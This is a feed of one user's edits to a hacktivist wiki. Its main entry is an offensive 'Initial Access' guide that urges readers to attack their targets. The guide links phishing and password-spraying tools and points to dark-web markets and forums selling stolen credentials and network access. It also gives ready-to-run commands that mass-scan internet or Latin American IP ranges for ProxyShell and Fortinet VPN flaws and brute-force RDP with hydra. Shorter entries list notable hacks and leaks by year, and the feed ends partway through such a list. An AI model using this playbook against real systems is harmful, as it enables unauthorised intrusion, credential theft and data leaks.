<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://enlacehacktivista.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Booda</id>
	<title>Enlace Hacktivista - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://enlacehacktivista.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Booda"/>
	<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php/Special:Contributions/Booda"/>
	<updated>2026-04-22T17:35:35Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.43.8</generator>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1756</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1756"/>
		<updated>2024-10-08T11:55:20Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://exposed.lol&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
* https://ramp4u.io [Free &amp;amp; Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
If the output from the scans is too large, then you can use the [https://linux.die.net/man/1/split split] command to break the output file up into smaller files and scan against those via multiple [https://linux.die.net/man/1/screen screen] windows/sessions to make your scanning more efficient.&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;split -l 10000 results.txt results_&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Cyber_Partisans_-_KGB&amp;diff=1755</id>
		<title>Cyber Partisans - KGB</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Cyber_Partisans_-_KGB&amp;diff=1755"/>
		<updated>2024-05-09T12:35:20Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
[[File:Belarus_Cyber_Partisans_logo.jpg|350px|border|#The Cyber Partisans Hacktivists]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://en.wikipedia.org/wiki/Cyber_Partisans&lt;br /&gt;
* https://enlacehacktivista.org/index.php/Cyber_Partisans&lt;br /&gt;
* YouTube - Seytonic: https://youtu.be/-3GbwsKWlOA?si=HLTZa-P4xWBs88FQ&amp;amp;t=233&lt;br /&gt;
* https://www.by.cpartisans.org/en/post/leak-of-denunciations-to-the-kgb-about-40-thousand-appeals-on-the-kgb-website-over-9-years&lt;br /&gt;
* https://www.by.cpartisans.org/en/post/kgb-officers-can-now-be-verified-by-anyone&lt;br /&gt;
* https://apnews.com/article/belarus-cyberattack-kgb-dissent-efc7e6acd9dfe8a118e1d2f526c4d6fa&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Cyber_Partisans_-_KGB&amp;diff=1754</id>
		<title>Cyber Partisans - KGB</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Cyber_Partisans_-_KGB&amp;diff=1754"/>
		<updated>2024-05-09T12:33:44Z</updated>

		<summary type="html">&lt;p&gt;Booda: Cyber Partisans FSB Hack &amp;amp; Leak&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
[[File:Belarus_Cyber_Partisans_logo.jpg|350px|border|#The Cyber Partisans Hacktivists]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://enlacehacktivista.org/index.php/Cyber_Partisans&lt;br /&gt;
* YouTube - Seytonic: https://youtu.be/-3GbwsKWlOA?si=HLTZa-P4xWBs88FQ&amp;amp;t=233&lt;br /&gt;
* https://www.by.cpartisans.org/en/post/leak-of-denunciations-to-the-kgb-about-40-thousand-appeals-on-the-kgb-website-over-9-years&lt;br /&gt;
* https://www.by.cpartisans.org/en/post/kgb-officers-can-now-be-verified-by-anyone&lt;br /&gt;
* https://apnews.com/article/belarus-cyberattack-kgb-dissent-efc7e6acd9dfe8a118e1d2f526c4d6fa&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=File:Belarus_Cyber_Partisans_logo.jpg&amp;diff=1753</id>
		<title>File:Belarus Cyber Partisans logo.jpg</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=File:Belarus_Cyber_Partisans_logo.jpg&amp;diff=1753"/>
		<updated>2024-05-09T12:31:35Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1752</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1752"/>
		<updated>2024-05-09T12:26:52Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2024 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
* [[TheGEOGroup]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;br /&gt;
* [[Rules of engagement - Red Cross]]&lt;br /&gt;
&lt;br /&gt;
== 2024 ==&lt;br /&gt;
* [[SiegedSec - #OpTransRights2 ]]&lt;br /&gt;
* [[The Post Millennial]]&lt;br /&gt;
* [[Cyber Partisans - KGB]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1751</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1751"/>
		<updated>2024-05-09T12:20:55Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2024 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
* [[TheGEOGroup]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
